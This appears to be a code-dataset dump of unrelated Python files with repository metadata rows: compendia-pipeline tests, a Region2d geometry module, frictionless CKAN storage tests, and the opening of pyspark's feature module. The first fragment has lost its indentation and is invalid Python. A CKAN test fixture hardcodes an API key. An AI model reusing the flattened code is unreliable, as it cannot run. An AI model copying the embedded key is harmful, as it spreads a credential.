danio_rerio = Organism(name="DANIO_RERIO", taxonomy_id=1, qn_target=result)
danio_rerio.save()
cra = ComputationalResultAnnotation()
cra.data = {}
cra.data["organism_id"] = danio_rerio.id
cra.data["is_qn"] = True
cra.result = result
cra.save()
result = ComputationalResult()
result.save()
micros = []
for file in os.listdir("/home/user/data_store/raw/TEST/MICROARRAY/"):
if "microarray.txt" in file:
continue
create_sample_for_experiment(
{
"organism": danio_rerio,
"accession_code": file,
"technology": "MICROARRAY",
"filename": file,
"data_dir": "/home/user/data_store/raw/TEST/MICROARRAY/",
},
experiment,
)
micros.append(file)
experiment = Experiment()
experiment.accession_code = "GSE5678"
experiment.save()
result = ComputationalResult()
result.save()
rnas = []
for file in os.listdir("/home/user/data_store/raw/TEST/RNASEQ/"):
if "rnaseq.txt" in file:
continue
create_sample_for_experiment(
{
"organism": danio_rerio,
"accession_code": file,
"technology": "RNA-SEQ",
"filename": file,
"data_dir": "/home/user/data_store/raw/TEST/RNASEQ/",
},
experiment,
)
rnas.append(file)
sample = create_sample_for_experiment(
{
"organism": danio_rerio,
"accession_code": "GSM1487222",
"title": "this sample will be filtered",
"technology": "RNA-SEQ",
"filename": None,
},
experiment,
)
rnas.append(sample.accession_code)
dset = Dataset()
dset.data = {"GSE1234": micros, "GSE5678": rnas}
dset.scale_by = "NONE"
dset.aggregate_by = "SPECIES"
dset.svd_algorithm = "ARPACK"
dset.quantile_normalize = True
dset.save()
pjda = ProcessorJobDatasetAssociation()
pjda.processor_job = job
pjda.dataset = dset
pjda.save()
final_context = create_compendia.create_compendia(job.id)
self.assertSucceeded(job)
self.assertEqual(final_context["compendium_result"].result.computedfile_set.count(), 1)
for file in final_context["compendium_result"].result.computedfile_set.all():
self.assertTrue(os.path.exists(file.absolute_file_path))
self.assertEqual(final_context["compendium_result"].svd_algorithm, "ARPACK")
self.assertEqual(
final_context["compendium_result"].primary_organism.name,
final_context["organism_name"],
)
self.assertEqual(final_context["compendium_result"].primary_organism.name, "DANIO_RERIO")
self.assertEqual(final_context["compendium_result"].organisms.count(), 1)
self.assertEqual(len(final_context["filtered_samples"]), 10)
self.assertTrue("GSM1487222" in final_context["filtered_samples"])
self.assertEqual(
final_context["filtered_samples"]["GSM1487222"]["experiment_accession_code"], "GSE5678"
)
self.assertIn(
"This sample did not have a processed file",
final_context["filtered_samples"]["GSM1487222"]["reason"],
)
self.assertEqual(
len(
list(
filter(
lambda x: "less than 50% present values" in x["reason"],
final_context["filtered_samples"].values(),
)
)
),
9,
)
zf = zipfile.ZipFile(
final_context["compendium_result"].result.computedfile_set.first().absolute_file_path
)
with zf.open("aggregated_metadata.json") as f:
metadata = json.load(f)
self.assertFalse(metadata.get("quant_sf_only"))
self.assertEqual(metadata.get("compendium_version"), 1)
self.assertEqual(metadata.get("num_samples"), 830)
self.assertEqual(metadata.get("num_experiments"), 2)
self.assertTrue(metadata.get("quantile_normalized"))
self.assertIn("ks_statistic", final_context)
self.assertIn("ks_pvalue", final_context)
self.assertEqual(final_context["ks_pvalue"], 1.0)
@tag("compendia")
def test_create_compendia_microarray_only(self):
job = ProcessorJob()
job.pipeline_applied = ProcessorPipeline.CREATE_COMPENDIA.value
job.save()
experiment = Experiment()
experiment.accession_code = "GSE1234"
experiment.save()
result = ComputationalResult()
result.save()
qn_target = ComputedFile()
qn_target.filename = "danio_target.tsv"
qn_target.absolute_file_path = "/home/user/data_store/QN/danio_target.tsv"
qn_target.is_qn_target = True
qn_target.size_in_bytes = "12345"
qn_target.sha1 = "aabbccddeeff"
qn_target.result = result
qn_target.save()
danio_rerio = Organism(name="DANIO_RERIO", taxonomy_id=1, qn_target=result)
danio_rerio.save()
cra = ComputationalResultAnnotation()
cra.data = {}
cra.data["organism_id"] = danio_rerio.id
cra.data["is_qn"] = True
cra.result = result
cra.save()
result = ComputationalResult()
result.save()
micros = []
for file in os.listdir("/home/user/data_store/raw/TEST/MICROARRAY/"):
if "microarray.txt" in file:
continue
create_sample_for_experiment(
{
"organism": danio_rerio,
"accession_code": file,
"technology": "MICROARRAY",
"filename": file,
"data_dir": "/home/user/data_store/raw/TEST/MICROARRAY/",
},
experiment,
)
micros.append(file)
dset = Dataset()
dset.data = {"GSE1234": micros}
dset.scale_by = "NONE"
dset.aggregate_by = "SPECIES"
dset.svd_algorithm = "ARPACK"
dset.quantile_normalize = True
dset.save()
pjda = ProcessorJobDatasetAssociation()
pjda.processor_job = job
pjda.dataset = dset
pjda.save()
final_context = create_compendia.create_compendia(job.id)
self.assertSucceeded(job)
self.assertEqual(final_context["compendium_result"].result.computedfile_set.count(), 1)
for file in final_context["compendium_result"].result.computedfile_set.all():
self.assertTrue(os.path.exists(file.absolute_file_path))
self.assertEqual(final_context["compendium_result"].svd_algorithm, "ARPACK")
self.assertEqual(
final_context["compendium_result"].primary_organism.name,
final_context["organism_name"],
)
self.assertEqual(final_context["compendium_result"].primary_organism.name, "DANIO_RERIO")
self.assertEqual(final_context["compendium_result"].organisms.count(), 1)
zf = zipfile.ZipFile(
final_context["compendium_result"].result.computedfile_set.first().absolute_file_path
)
with zf.open("aggregated_metadata.json") as f:
metadata = json.load(f)
self.assertFalse(metadata.get("quant_sf_only"))
self.assertEqual(metadata.get("num_samples"), 420)
self.assertEqual(metadata.get("num_experiments"), 1)
self.assertTrue(metadata.get("quantile_normalized"))
self.assertIn("ks_statistic", final_context)
self.assertIn("ks_pvalue", final_context)
self.assertEqual(final_context["ks_pvalue"], 1.0)
@tag("compendia")
def test_filter_rnaseq_matrix_drop_row_sums(self):
job = ProcessorJob()
job.pipeline_applied = ProcessorPipeline.CREATE_COMPENDIA.value
job.save()
samples = list(str(i) for i in range(0, 10))
df = pd.DataFrame(columns=samples)
for i in range(1, 101):
df.loc[str(i)] = {idx: i for idx in samples}
job_context = {"rnaseq_matrix": df, "job": job}
final_job_context = create_compendia._filter_rnaseq_matrix(job_context)
filtered_matrix = final_job_context["filtered_rnaseq_matrix"]
self.assertNotIn("rnaseq_matrix", final_job_context.keys())
self.assertEqual(set(filtered_matrix.index), set(str(i) for i in range(11, 101)))
@tag("compendia")
def test_drop_samples(self):
job = ProcessorJob()
job.pipeline_applied = ProcessorPipeline.CREATE_COMPENDIA.value
job.save()
danio_rerio = Organism(name="DANIO_RERIO", taxonomy_id=1)
danio_rerio.save()
experiment = Experiment()
experiment.accession_code = "GSE1234"
experiment.save()
samples = list(str(i) for i in range(0, 10))
for i in samples:
create_sample_for_experiment(
{"organism": danio_rerio, "accession_code": i, "technology": "MICROARRAY"},
experiment,
)
dset = Dataset()
dset.data = {"GSE1234": "ALL"}
dset.scale_by = "NONE"
dset.aggregate_by = "SPECIES"
dset.svd_algorithm = "ARPACK"
dset.quantile_normalize = True
dset.save()
df = pd.DataFrame(columns=samples)
for i in range(1, 101):
row_i = {idx: i for idx in samples}
if i % 3 != 0 and i % 3 != 1:
del row_i["0"]
if i % 2 != 0:
del row_i["1"]
if i % 3 != 0:
del row_i["2"]
if i % 4 != 0:
del row_i["3"]
df.loc[str(i)] = row_i
job_context = {
"microarray_matrix": df,
"job": job,
"dataset": dset,
"filtered_samples": {},
}
job_context = create_compendia._full_outer_join_gene_matrices(job_context)
final_job_context = create_compendia._filter_rows_and_columns(job_context)
filtered_matrix = final_job_context["row_col_filtered_matrix"]
self.assertEqual(set(filtered_matrix.columns), {"0", "1"} | {str(i) for i in range(4, 10)})
self.assertEqual(set(final_job_context["filtered_samples"].keys()), {"2", "3"})
for v in final_job_context["filtered_samples"].values():
self.assertIn("less than 50% present", v["reason"])
@tag("compendia")
def test_imputation(self):
job = ProcessorJob()
job.pipeline_applied = ProcessorPipeline.CREATE_COMPENDIA.value
job.save()
experiment = Experiment()
experiment.accession_code = "GSE1234"
experiment.save()
result = ComputationalResult()
result.save()
qn_target = ComputedFile()
qn_target.filename = "danio_target.tsv"
qn_target.absolute_file_path = "/home/user/data_store/QN/danio_target.tsv"
qn_target.is_qn_target = True
qn_target.size_in_bytes = "12345"
qn_target.sha1 = "aabbccddeeff"
qn_target.result = result
qn_target.save()
danio_rerio = Organism(name="DANIO_RERIO", taxonomy_id=1, qn_target=result)
danio_rerio.save()
cra = ComputationalResultAnnotation()
cra.data = {}
cra.data["organism_id"] = danio_rerio.id
cra.data["is_qn"] = True
cra.result = result
cra.save()
result = ComputationalResult()
result.save()
micros = []
for file in os.listdir("/home/user/data_store/raw/TEST/MICROARRAY/"):
if "microarray.txt" in file:
continue
create_sample_for_experiment(
{
"organism": danio_rerio,
"accession_code": file,
"technology": "MICROARRAY",
"filename": file,
"data_dir": "/home/user/data_store/raw/TEST/MICROARRAY/",
},
experiment,
)
micros.append(file)
experiment = Experiment()
experiment.accession_code = "GSE5678"
experiment.save()
result = ComputationalResult()
result.save()
rnas = []
for file in os.listdir("/home/user/data_store/raw/TEST/RNASEQ/"):
if "rnaseq.txt" in file:
continue
create_sample_for_experiment(
{
"organism": danio_rerio,
"accession_code": file,
"technology": "RNA-SEQ",
"filename": file,
"data_dir": "/home/user/data_store/raw/TEST/RNASEQ/",
},
experiment,
)
rnas.append(file)
sample = create_sample_for_experiment(
{
"organism": danio_rerio,
"accession_code": "GSM1487222",
"title": "this sample will be filtered",
"technology": "RNA-SEQ",
"filename": None,
},
experiment,
)
rnas.append(sample.accession_code)
dset = Dataset()
dset.data = {"GSE1234": micros, "GSE5678": rnas}
dset.scale_by = "NONE"
dset.aggregate_by = "SPECIES"
dset.svd_algorithm = "ARPACK"
dset.quantile_normalize = True
dset.save()
pjda = ProcessorJobDatasetAssociation()
pjda.processor_job = job
pjda.dataset = dset
pjda.save()
imputation_index = create_compendia.COMPENDIA_PIPELINE.index(
create_compendia._perform_imputation
)
pipeline = Pipeline(name=PipelineEnum.CREATE_COMPENDIA.value)
job_context = utils.run_pipeline(
{"job_id": job.id, "pipeline": pipeline},
create_compendia.COMPENDIA_PIPELINE[:imputation_index],
)
expected_context = utils.run_pipeline(
job_context.copy(), [create_compendia.COMPENDIA_PIPELINE[imputation_index]]
)
rare_rows = random.sample(list(job_context["microarray_matrix"].index), k=25)
rare_genes = {}
for row in rare_rows:
cols = random.sample(
list(job_context["microarray_matrix"].columns),
k=int(0.28 * 840),
)
rare_genes[row] = cols
for col in cols:
job_context["microarray_matrix"].loc[row, col] = np.nan
individual_indices = random.sample(
list(
itertools.product(
set(job_context["microarray_matrix"].index) - set(rare_rows),
job_context["microarray_matrix"].columns,
)
),
k=1000,
)
for row, col in individual_indices:
job_context["microarray_matrix"].loc[row, col] = np.nan
final_context = utils.run_pipeline(
job_context, [create_compendia.COMPENDIA_PIPELINE[imputation_index]]
)
self.assertDidNotFail(job)
index = set(final_context["merged_no_qn"].index) & set(
expected_context["merged_no_qn"].index
)
columns = set(final_context["merged_no_qn"].columns) & set(
expected_context["merged_no_qn"].columns
)
N = 0
squared_error = 0
affected_entries = {
*individual_indices,
*((row, col) for row, cols in rare_genes.items() for col in cols),
}
for row, col in affected_entries:
if row in index and col in columns:
actual = final_context["merged_no_qn"].loc[row, col]
expected = expected_context["merged_no_qn"].loc[row, col]
N += 1
squared_error += (actual - expected) ** 2
rmse = math.sqrt(squared_error / N)
self.assertLess(abs(rmse - 0.2868600293662542), 0.05)
| true
| true
|
1c4234506b59f49708e87e082d6cfd6b4e7c42d0
| 3,253
|
py
|
Python
|
src/model/region2d.py
|
RobertMcCarter/animal-finder
|
5ac839a65df62ab312e440ce43416727492e84d8
|
[
"MIT"
] | null | null | null |
src/model/region2d.py
|
RobertMcCarter/animal-finder
|
5ac839a65df62ab312e440ce43416727492e84d8
|
[
"MIT"
] | null | null | null |
src/model/region2d.py
|
RobertMcCarter/animal-finder
|
5ac839a65df62ab312e440ce43416727492e84d8
|
[
"MIT"
] | null | null | null |
from dataclasses import dataclass
from typing import Union
@dataclass(frozen=True)
class Region2d:
"""The basic Region (rectangle) in an image
Top left is (0,0) and x increases to the right while
y increases down the image.
"""
x: int
y: int
w: int
h: int
@property
def x1(self) -> int:
return self.x
@property
def y1(self) -> int:
return self.y
@property
def x2(self) -> int:
return self.x + self.w
@property
def y2(self) -> int:
return self.y + self.h
@property
def right_x(self) -> int:
"""The computed right x value - basically (x + w)"""
return self.x2
@property
def bottom_y(self) -> int:
"""The computed bottom y value - basically (y + h)"""
return self.y2
# Return a new region 2d object with _all_ values scaled
# This is very useful when scaling up/down an image for display
def scale(region: Region2d, scaleFactor: float):
"""Scale this 2d region by the given scale (in both x and y directions)
returning a new region 2d with the new scaled values
"""
new_x: int = int(region.x * scaleFactor)
new_y: int = int(region.y * scaleFactor)
new_w: int = int(region.w * scaleFactor)
new_h: int = int(region.h * scaleFactor)
return Region2d(new_x, new_y, new_w, new_h)
def normalize(region: Region2d) -> Region2d:
"""The user may draw a rectangle "backwards" (from right to left)
so that the width and height are negative.
This function does the math to flip around the region 2d
x,y,w,h values so that the width and height are positive.
Returns:
[Region2d]: Returns a "normalized" region 2d with a positive width and height
"""
# If both width and height are positive, we're already normalized
# and we can just return ourself
if region.w > 0 and region.h > 0:
return region
# Either (or both) of width or height are negative, we need to create a new
# Region2d
x, y, w, h = region.x, region.y, region.w, region.h
if w < 0:
x, w = x + w, -w
if h < 0:
y, h = y + h, -h
return Region2d(x, y, w, h)
def intersects(a: Region2d, b: Region2d) -> bool:
"""Determines if the two image regions intersect at all
Args:
a (Region): The first region to test with
b (Region): The second region to test with
Returns:
bool: `True` if the two regions intersect at all, `False` if they do not
"""
return not ((a.x2 < b.x1 or a.x1 > b.x2) or (a.y1 > b.y2 or a.y2 < b.y1))
def intersectsAny(a: Region2d, testRegions: list[Region2d]) -> bool:
"""Determines if the `a` region intersects any region in the list of `testRegions`.
Args:
a (Region): The first region to test with
testRegions (list[Region]): The second region to test with
Returns:
bool: `True` if the a region intersect any of the regions in `testRegions`,
`False` if they do not
"""
return any(intersects(a, b) for b in testRegions)
@dataclass(frozen=True)
class TaggedRegion2d(Region2d):
"""Represents a tagged region - either `True` or `False` there is an animal in the region"""
tag: bool
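# --- Hedged usage sketch (added for illustration; not part of the original module). ---
# The concrete numbers are assumptions chosen only to demonstrate the helpers above.
if __name__ == "__main__":
    # normalize() moves (x, y) to the true top-left corner and makes w/h positive
    backwards = Region2d(x=10, y=10, w=-4, h=-6)
    assert normalize(backwards) == Region2d(x=6, y=4, w=4, h=6)
    # intersects()/intersectsAny() test axis-aligned overlap
    a = Region2d(0, 0, 10, 10)
    b = Region2d(5, 5, 10, 10)  # overlaps a
    c = Region2d(20, 20, 5, 5)  # disjoint from a
    assert intersects(a, b)
    assert not intersects(a, c)
    assert intersectsAny(a, [c, b])
    # scale() multiplies every coordinate, e.g. for rendering at 2x zoom
    assert scale(a, 2.0) == Region2d(0, 0, 20, 20)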
| 28.787611
| 96
| 0.627421
|
from dataclasses import dataclass
from typing import Union
@dataclass(frozen=True)
class Region2d:
x: int
y: int
w: int
h: int
@property
def x1(self) -> int:
return self.x
@property
def y1(self) -> int:
return self.y
@property
def x2(self) -> int:
return self.x + self.w
@property
def y2(self) -> int:
return self.y + self.h
@property
def right_x(self) -> int:
return self.x2
@property
def bottom_y(self) -> int:
return self.y2
def scale(region: Region2d, scaleFactor: float):
new_x: int = int(region.x * scaleFactor)
new_y: int = int(region.y * scaleFactor)
new_w: int = int(region.w * scaleFactor)
new_h: int = int(region.h * scaleFactor)
return Region2d(new_x, new_y, new_w, new_h)
def normalize(region: Region2d) -> Region2d:
# and we can just return ourself
if region.w > 0 and region.h > 0:
return region
# Either (or both) of width or height are negative, we need to create a new
# Region2d
x, y, w, h = region.x, region.y, region.w, region.h
if w < 0:
x, w = x + w, -w
if h < 0:
y, h = y + h, -h
return Region2d(x, y, w, h)
def intersects(a: Region2d, b: Region2d) -> bool:
return not ((a.x2 < b.x1 or a.x1 > b.x2) or (a.y1 > b.y2 or a.y2 < b.y1))
def intersectsAny(a: Region2d, testRegions: list[Region2d]) -> bool:
return any(intersects(a, b) for b in testRegions)
@dataclass(frozen=True)
class TaggedRegion2d(Region2d):
tag: bool
| true
| true
|
1c4234615ff82fe07f07ba85b5f296cecc94fb84
| 7,813
|
py
|
Python
|
tests/plugins/test_ckan.py
|
augusto-herrmann/frictionless-py
|
b4ff35f064141a2c04882edb592666ca6b066776
|
[
"MIT"
] | 1
|
2021-11-08T22:29:30.000Z
|
2021-11-08T22:29:30.000Z
|
tests/plugins/test_ckan.py
|
augusto-herrmann/frictionless-py
|
b4ff35f064141a2c04882edb592666ca6b066776
|
[
"MIT"
] | null | null | null |
tests/plugins/test_ckan.py
|
augusto-herrmann/frictionless-py
|
b4ff35f064141a2c04882edb592666ca6b066776
|
[
"MIT"
] | null | null | null |
import pytest
import datetime
from frictionless import Package, Resource, FrictionlessException
from frictionless.plugins.ckan import CkanStorage, CkanDialect
# Parser
@pytest.mark.vcr
def test_ckan_parser(options):
url = options.pop("url")
dialect = CkanDialect(resource="table", **options)
source = Resource("data/timezone.csv")
target = source.write(url, format="ckan", dialect=dialect)
with target:
assert target.header == ["id", "name"]
assert target.read_rows() == [
{"id": 1, "name": "english"},
{"id": 2, "name": "中国人"},
]
@pytest.mark.vcr
def test_ckan_parser_timezone(options):
url = options.pop("url")
dialect = CkanDialect(resource="timezone", **options)
source = Resource("data/timezone.csv")
target = source.write(url, format="ckan", dialect=dialect)
with target:
assert target.read_rows() == [
{"datetime": datetime.datetime(2020, 1, 1, 15), "time": datetime.time(15)},
{"datetime": datetime.datetime(2020, 1, 1, 15), "time": datetime.time(15)},
{"datetime": datetime.datetime(2020, 1, 1, 15), "time": datetime.time(15)},
{"datetime": datetime.datetime(2020, 1, 1, 15), "time": datetime.time(15)},
]
# Storage
@pytest.mark.vcr
def test_ckan_storage_types(options):
url = options.pop("url")
dialect = CkanDialect(**options)
source = Package("data/storage/types.json")
storage = source.to_ckan(url, dialect=dialect)
target = Package.from_ckan(url, dialect=dialect)
# Assert metadata
assert target.get_resource("types").schema == {
"fields": [
{"name": "any", "type": "string"}, # type fallback
{"name": "array", "type": "array"},
{"name": "boolean", "type": "boolean"},
{"name": "date", "type": "string"}, # type fallback
{"name": "date_year", "type": "string"}, # type fallback
{"name": "datetime", "type": "datetime"},
{"name": "duration", "type": "string"}, # type fallback
{"name": "geojson", "type": "object"}, # type downgrade
{"name": "geopoint", "type": "string"}, # type fallback
{"name": "integer", "type": "integer"},
{"name": "number", "type": "number"},
{"name": "object", "type": "object"},
{"name": "string", "type": "string"},
{"name": "time", "type": "time"},
{"name": "year", "type": "integer"}, # type downgrade
{"name": "yearmonth", "type": "string"}, # type fallback
],
}
# Assert data
assert target.get_resource("types").read_rows() == [
{
"any": "中国人",
"array": ["Mike", "John"],
"boolean": True,
"date": "2015-01-01",
"date_year": "2015",
"datetime": datetime.datetime(2015, 1, 1, 3, 0),
"duration": "P1Y1M",
"geojson": {"type": "Point", "coordinates": [33, 33.33]},
"geopoint": "30,70",
"integer": 1,
"number": 7,
"object": {"chars": 560},
"string": "english",
"time": datetime.time(3, 0),
"year": 2015,
"yearmonth": "2015-01",
},
]
# Cleanup storage
storage.delete_package(target.resource_names)
@pytest.mark.vcr
def test_ckan_storage_integrity(options):
url = options.pop("url")
dialect = CkanDialect(**options)
source = Package("data/storage/integrity.json")
storage = source.to_ckan(url, dialect=dialect)
target = Package.from_ckan(url, dialect=dialect)
# Assert metadata (main)
assert target.get_resource("integrity_main").schema == {
"fields": [
{"name": "id", "type": "integer"},
{"name": "parent", "type": "integer"},
{"name": "description", "type": "string"},
],
# primary key removal
# foreign keys removal
}
# Assert metadata (link)
assert target.get_resource("integrity_link").schema == {
"fields": [
{"name": "main_id", "type": "integer"},
{"name": "some_id", "type": "integer"}, # constraint removal
{"name": "description", "type": "string"}, # constraint removal
],
# primary key removal
# foreign keys removal
}
# Assert data (main)
assert target.get_resource("integrity_main").read_rows() == [
{"id": 1, "parent": None, "description": "english"},
{"id": 2, "parent": 1, "description": "中国人"},
]
# Assert data (link)
assert target.get_resource("integrity_link").read_rows() == [
{"main_id": 1, "some_id": 1, "description": "note1"},
{"main_id": 2, "some_id": 2, "description": "note2"},
]
# Cleanup storage
storage.delete_package(target.resource_names)
@pytest.mark.vcr
def test_ckan_storage_constraints(options):
url = options.pop("url")
dialect = CkanDialect(**options)
source = Package("data/storage/constraints.json")
storage = source.to_ckan(url, dialect=dialect)
target = Package.from_ckan(url, dialect=dialect)
# Assert metadata
assert target.get_resource("constraints").schema == {
"fields": [
{"name": "required", "type": "string"}, # constraint removal
{"name": "minLength", "type": "string"}, # constraint removal
{"name": "maxLength", "type": "string"}, # constraint removal
{"name": "pattern", "type": "string"}, # constraint removal
{"name": "enum", "type": "string"}, # constraint removal
{"name": "minimum", "type": "integer"}, # constraint removal
{"name": "maximum", "type": "integer"}, # constraint removal
],
}
# Assert data
assert target.get_resource("constraints").read_rows() == [
{
"required": "passing",
"minLength": "passing",
"maxLength": "passing",
"pattern": "passing",
"enum": "passing",
"minimum": 5,
"maximum": 5,
},
]
# Cleanup storage
storage.delete_package(target.resource_names)
@pytest.mark.vcr
def test_ckan_storage_not_existent_error(options):
url = options.pop("url")
dialect = CkanDialect(**options)
storage = CkanStorage(url, dialect=dialect)
with pytest.raises(FrictionlessException) as excinfo:
storage.read_resource("bad")
error = excinfo.value.error
assert error.code == "storage-error"
assert error.note.count("does not exist")
@pytest.mark.vcr
def test_ckan_storage_write_resource_existent_error(options):
url = options.pop("url")
dialect = CkanDialect(**options)
storage = CkanStorage(url, dialect=dialect)
resource = Resource(path="data/table.csv")
storage.write_resource(resource, force=True)
with pytest.raises(FrictionlessException) as excinfo:
storage.write_resource(resource)
error = excinfo.value.error
assert error.code == "storage-error"
assert error.note.count("already exists")
# Cleanup storage
storage.delete_package(list(storage))
@pytest.mark.vcr
def test_ckan_storage_delete_resource_not_existent_error(options):
url = options.pop("url")
dialect = CkanDialect(**options)
storage = CkanStorage(url, dialect=dialect)
with pytest.raises(FrictionlessException) as excinfo:
storage.delete_resource("bad")
error = excinfo.value.error
assert error.code == "storage-error"
assert error.note.count("does not exist")
# Fixtures
@pytest.fixture
def options():
return {
"url": "https://demo.ckan.org/",
"dataset": "frictionless",
"apikey": "51912f57-a657-4caa-b2a7-0a1c16821f4b",
}
| 33.676724
| 87
| 0.581211
|
import pytest
import datetime
from frictionless import Package, Resource, FrictionlessException
from frictionless.plugins.ckan import CkanStorage, CkanDialect
@pytest.mark.vcr
def test_ckan_parser(options):
url = options.pop("url")
dialect = CkanDialect(resource="table", **options)
source = Resource("data/timezone.csv")
target = source.write(url, format="ckan", dialect=dialect)
with target:
assert target.header == ["id", "name"]
assert target.read_rows() == [
{"id": 1, "name": "english"},
{"id": 2, "name": "中国人"},
]
@pytest.mark.vcr
def test_ckan_parser_timezone(options):
url = options.pop("url")
dialect = CkanDialect(resource="timezone", **options)
source = Resource("data/timezone.csv")
target = source.write(url, format="ckan", dialect=dialect)
with target:
assert target.read_rows() == [
{"datetime": datetime.datetime(2020, 1, 1, 15), "time": datetime.time(15)},
{"datetime": datetime.datetime(2020, 1, 1, 15), "time": datetime.time(15)},
{"datetime": datetime.datetime(2020, 1, 1, 15), "time": datetime.time(15)},
{"datetime": datetime.datetime(2020, 1, 1, 15), "time": datetime.time(15)},
]
@pytest.mark.vcr
def test_ckan_storage_types(options):
url = options.pop("url")
dialect = CkanDialect(**options)
source = Package("data/storage/types.json")
storage = source.to_ckan(url, dialect=dialect)
target = Package.from_ckan(url, dialect=dialect)
assert target.get_resource("types").schema == {
"fields": [
{"name": "any", "type": "string"},
{"name": "array", "type": "array"},
{"name": "boolean", "type": "boolean"},
{"name": "date", "type": "string"},
{"name": "date_year", "type": "string"},
{"name": "datetime", "type": "datetime"},
{"name": "duration", "type": "string"},
{"name": "geojson", "type": "object"},
{"name": "geopoint", "type": "string"},
{"name": "integer", "type": "integer"},
{"name": "number", "type": "number"},
{"name": "object", "type": "object"},
{"name": "string", "type": "string"},
{"name": "time", "type": "time"},
{"name": "year", "type": "integer"},
{"name": "yearmonth", "type": "string"},
],
}
assert target.get_resource("types").read_rows() == [
{
"any": "中国人",
"array": ["Mike", "John"],
"boolean": True,
"date": "2015-01-01",
"date_year": "2015",
"datetime": datetime.datetime(2015, 1, 1, 3, 0),
"duration": "P1Y1M",
"geojson": {"type": "Point", "coordinates": [33, 33.33]},
"geopoint": "30,70",
"integer": 1,
"number": 7,
"object": {"chars": 560},
"string": "english",
"time": datetime.time(3, 0),
"year": 2015,
"yearmonth": "2015-01",
},
]
storage.delete_package(target.resource_names)
@pytest.mark.vcr
def test_ckan_storage_integrity(options):
url = options.pop("url")
dialect = CkanDialect(**options)
source = Package("data/storage/integrity.json")
storage = source.to_ckan(url, dialect=dialect)
target = Package.from_ckan(url, dialect=dialect)
assert target.get_resource("integrity_main").schema == {
"fields": [
{"name": "id", "type": "integer"},
{"name": "parent", "type": "integer"},
{"name": "description", "type": "string"},
],
}
assert target.get_resource("integrity_link").schema == {
"fields": [
{"name": "main_id", "type": "integer"},
{"name": "some_id", "type": "integer"},
{"name": "description", "type": "string"},
],
}
assert target.get_resource("integrity_main").read_rows() == [
{"id": 1, "parent": None, "description": "english"},
{"id": 2, "parent": 1, "description": "中国人"},
]
assert target.get_resource("integrity_link").read_rows() == [
{"main_id": 1, "some_id": 1, "description": "note1"},
{"main_id": 2, "some_id": 2, "description": "note2"},
]
storage.delete_package(target.resource_names)
@pytest.mark.vcr
def test_ckan_storage_constraints(options):
url = options.pop("url")
dialect = CkanDialect(**options)
source = Package("data/storage/constraints.json")
storage = source.to_ckan(url, dialect=dialect)
target = Package.from_ckan(url, dialect=dialect)
assert target.get_resource("constraints").schema == {
"fields": [
{"name": "required", "type": "string"},
{"name": "minLength", "type": "string"},
{"name": "maxLength", "type": "string"},
{"name": "pattern", "type": "string"},
{"name": "enum", "type": "string"},
{"name": "minimum", "type": "integer"},
{"name": "maximum", "type": "integer"},
],
}
assert target.get_resource("constraints").read_rows() == [
{
"required": "passing",
"minLength": "passing",
"maxLength": "passing",
"pattern": "passing",
"enum": "passing",
"minimum": 5,
"maximum": 5,
},
]
storage.delete_package(target.resource_names)
@pytest.mark.vcr
def test_ckan_storage_not_existent_error(options):
url = options.pop("url")
dialect = CkanDialect(**options)
storage = CkanStorage(url, dialect=dialect)
with pytest.raises(FrictionlessException) as excinfo:
storage.read_resource("bad")
error = excinfo.value.error
assert error.code == "storage-error"
assert error.note.count("does not exist")
@pytest.mark.vcr
def test_ckan_storage_write_resource_existent_error(options):
url = options.pop("url")
dialect = CkanDialect(**options)
storage = CkanStorage(url, dialect=dialect)
resource = Resource(path="data/table.csv")
storage.write_resource(resource, force=True)
with pytest.raises(FrictionlessException) as excinfo:
storage.write_resource(resource)
error = excinfo.value.error
assert error.code == "storage-error"
assert error.note.count("already exists")
storage.delete_package(list(storage))
@pytest.mark.vcr
def test_ckan_storage_delete_resource_not_existent_error(options):
url = options.pop("url")
dialect = CkanDialect(**options)
storage = CkanStorage(url, dialect=dialect)
with pytest.raises(FrictionlessException) as excinfo:
storage.delete_resource("bad")
error = excinfo.value.error
assert error.code == "storage-error"
assert error.note.count("does not exist")
@pytest.fixture
def options():
return {
"url": "https://demo.ckan.org/",
"dataset": "frictionless",
"apikey": "51912f57-a657-4caa-b2a7-0a1c16821f4b",
}
| true
| true
|
1c423486be8d98de941898b2331c90c0380eded0
| 63,214
|
py
|
Python
|
python/pyspark/ml/feature.py
|
bbejeck/spark
|
56a0fe5c6e4ae2929c48fae2d6225558d020e5f9
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
python/pyspark/ml/feature.py
|
bbejeck/spark
|
56a0fe5c6e4ae2929c48fae2d6225558d020e5f9
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
python/pyspark/ml/feature.py
|
bbejeck/spark
|
56a0fe5c6e4ae2929c48fae2d6225558d020e5f9
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys
if sys.version > '3':
basestring = str
from pyspark.rdd import ignore_unicode_prefix
from pyspark.ml.param.shared import *
from pyspark.ml.util import keyword_only
from pyspark.ml.wrapper import JavaEstimator, JavaModel, JavaTransformer, _jvm
from pyspark.mllib.common import inherit_doc
from pyspark.mllib.linalg import _convert_to_vector
__all__ = ['Binarizer', 'Bucketizer', 'DCT', 'ElementwiseProduct', 'HashingTF', 'IDF', 'IDFModel',
'IndexToString', 'NGram', 'Normalizer', 'OneHotEncoder', 'PCA', 'PCAModel',
'PolynomialExpansion', 'RegexTokenizer', 'RFormula', 'RFormulaModel', 'SQLTransformer',
'StandardScaler', 'StandardScalerModel', 'StopWordsRemover', 'StringIndexer',
'StringIndexerModel', 'Tokenizer', 'VectorAssembler', 'VectorIndexer', 'VectorSlicer',
'Word2Vec', 'Word2VecModel']
@inherit_doc
class Binarizer(JavaTransformer, HasInputCol, HasOutputCol):
"""
.. note:: Experimental
Binarize a column of continuous features given a threshold.
>>> df = sqlContext.createDataFrame([(0.5,)], ["values"])
>>> binarizer = Binarizer(threshold=1.0, inputCol="values", outputCol="features")
>>> binarizer.transform(df).head().features
0.0
>>> binarizer.setParams(outputCol="freqs").transform(df).head().freqs
0.0
